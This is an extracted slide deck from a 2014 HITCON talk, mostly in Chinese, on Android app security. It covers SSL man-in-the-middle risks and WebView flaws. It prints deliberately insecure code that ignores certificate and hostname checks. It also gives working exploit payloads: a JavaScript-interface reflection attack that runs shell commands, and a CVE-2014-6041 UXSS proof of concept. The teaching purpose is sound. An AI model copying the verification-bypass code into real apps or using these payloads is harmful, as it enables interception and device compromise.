[2014/10/06] hitcon freetalk - app security on android
DESCRIPTION
[2014/10/06] HITCON Freetalk - App Security on AndroidTRANSCRIPT
6
7
9
10
1. Client Hello
2. Server Hello3. Certificate
4. ServerHelloDone
5. ClientKeyExchange6. ChangeCipherSpec7. Handshake Finished
8. ChangeCipherSpec9. Handshake Finished
10. Application Data (HTTP)11. Application Data (HTTP)
Server Authentication
SSL 加密連線handshake 過程
檢查伺服器憑證
‧不是只要透過 SSL 加密連線就會安全
‧需要檢查伺服器所使用的憑證是否可靠合法
11
Attacker
Victim
中間⼈人攻擊 (Man-In-The-Middle Attack)
12
Server
13
15
16
!URL url = new URL("https://wikipedia.org"); URLConnection urlConnection = url.openConnection(); InputStream in = urlConnection.getInputStream(); !… !WebView mWebView = (WebView) findViewById(R.id.webView); mWebView.loadUrl("https://wikipedia.org");
17
18ref: http://devco.re/blog/2014/08/15/ssl-mishandling-on-mobile-app-development/
19ref: http://www.zdnet.com/hundreds-of-android-apps-open-to-ssl-linked-intercept-fail-7000033365/
20ref: http://www.kb.cert.org/vuls/id/582497
‣‣
21ref: http://www.find.org.tw/find/home.aspx?page=many&id=385
23
憑證被判斷為無效的 SSL 連線,藉由 handler.proceed() ⽽而繼續執⾏行
!!mWebView.setWebViewClient(new WebViewClient() { @Override public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) { handler.proceed(); // Ignore SSL certificate errors } }); !
24
TrustManager[] trustAllManager = new TrustManager[] { new X509TrustManager() { @Override public void checkClientTrusted(X509Certificate[] chain, String authType) { } ! @Override public void checkServerTrusted(X509Certificate[] chain, String authType) { } ! @Override public X509Certificate[] getAcceptedIssuers() { return null; } }}; !SSLContext sslContext = SSLContext.getInstance("TLS"); sslContext.init(null, trustAllManager, null);
預設有實作 SSL 檢查的元件被置換成忽略 SSL 檢查的元件
25
!URL url = new URL("https://www.example.com/"); HttpsURLConnection conn = (HttpsURLConnection) url.openConnection(); !conn.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); // or ... conn.setHostnameVerifier(new HostnameVerifier() { @Override public boolean verify(String hostname, SSLSession session) { return true; } });
不作核對,容許所有主機名稱通過檢查
26
28
29
class JsObject { public String toString() { return "Hello World"; } } !webView.getSettings().setJavaScriptEnabled(true); webView.addJavascriptInterface(new JsObject(), "injectedObject"); webView.loadUrl("http://www.example.com/"); !<html> <head>… <script> alert(injectedObject.toString()); </script> </head> <body>…</body> </html>
Hello World
31
32
!<script> function execute(cmdArgs) { return injectedObject.getClass().forName("java.lang.Runtime") .getMethod("getRuntime",null) .invoke(null,null).exec(cmdArgs); } execute(["/system/bin/sh","-c","cat vuln >> attacker.txt"]); </script>
Java Reflection API
33
35
36
37
38
39
測試 URL: http://devstd.in/cve/2014-6041/
測試環境: Android 4.1.1
!<html> <head> <title>CVE-2014-6041 UXSS DEMO</title> </head> <body> <iframe name="target_frame" src="http://devco.re/"></iframe> <br /> <input type="button" value="go" onclick="window.open('\u0000javascript:alert(document.body.innerHTML)', 'target_frame')" /> </body> </html>
40
UC Browser HD 3.4.1.483
CM Browser5.0.74
Maxthon Browser4.3.2.2000
測試結果
41
42
CVE-2012-6636 CVE-2014-1939 CVE-2014-6041
Android 2.X vulnerable non-vulnerable non-vulnerable
Android 3.X vulnerable vulnerable non-vulnerable
Android 4.0.X vulnerable vulnerable vulnerable
Android 4.1.X vulnerable vulnerable vulnerable
Android 4.2.X non-vulnerable non-vulnerable vulnerable
Android 4.3.X non-vulnerable non-vulnerable vulnerable
Android 4.4.X non-vulnerable non-vulnerable non-vulnerable
43
44